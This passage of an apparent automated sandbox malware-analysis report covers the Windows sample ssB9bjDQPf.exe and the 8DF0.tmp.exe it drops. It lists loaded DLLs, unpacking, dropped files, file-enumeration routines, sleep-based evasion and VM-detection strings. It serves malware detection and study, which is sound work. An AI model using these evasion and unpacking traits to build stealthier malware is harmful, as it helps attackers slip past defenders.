                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeUnpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeUnpacked PE file: 0.2.ssB9bjDQPf.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeUnpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AFF1BA pushad ; ret 0_2_00AFF1D6
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AFF338 push ecx; ret 0_2_00AFF355
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AFC70C pushad ; ret 0_2_00AFC734
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AFCBAD push 00000003h; ret 0_2_00AFCBB1
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AFAE02 push es; iretd 0_2_00AFAE13
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025009CD push ecx; ret 0_2_025009E0
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0252799F push esp; retf 0_2_025279A7
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0250CE18 push ss; retf 0_2_0250CE1D
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024FFFF3 push ecx; ret 0_2_02500006
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02527F9D push esp; retf 0_2_02527F9E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0252DDDE push dword ptr [esp+ecx-75h]; iretd 0_2_0252DDE2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02529DE8 pushad ; retf 0_2_02529DEF
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092DDDC pushad ; iretd 3_2_0092DE59
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_009304E2 pushad ; retf 3_2_009304E3
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092DCE7 push B35707CFh; iretd 3_2_0092DDDB
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092DCE7 pushad ; iretd 3_2_0092DE59
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092F6E5 push edx; iretd 3_2_0092F6F6
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092EBEE push ebp; iretd 3_2_0092EC21
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00930524 push ebx; iretd 3_2_0093054F
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092BD48 push ebx; ret 3_2_0092BDAD
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092CD68 push 00000032h; retf 3_2_0092CD6A
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A7B2C push ecx; ret 3_2_024A7B3F
                  Source: ssB9bjDQPf.exeStatic PE information: section name: .text entropy: 7.554689479421369
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.107429808843349
                  Source: 8DF0.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.107429808843349
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeWindow / User API: threadDelayed 1649Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeWindow / User API: threadDelayed 8339Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65694
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_3-33520
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeAPI coverage: 2.9 %
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324Thread sleep count: 1649 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324Thread sleep time: -1190578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324Thread sleep count: 8339 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324Thread sleep time: -6020758s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02528C59 FindFirstFileExW,0_2_02528C59
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02491EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02491EA7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249CF47
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02493F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02493F27
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0248DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0248DFD7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02481807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02481807
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02481820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_02481820
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02491827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02491827
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0249D8A7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_0249E0B7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02495127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02495127
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249E597
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A33F7 GetSystemInfo,wsprintfA,3_2_024A33F7
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.000000000099C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.000000000099C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaree
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
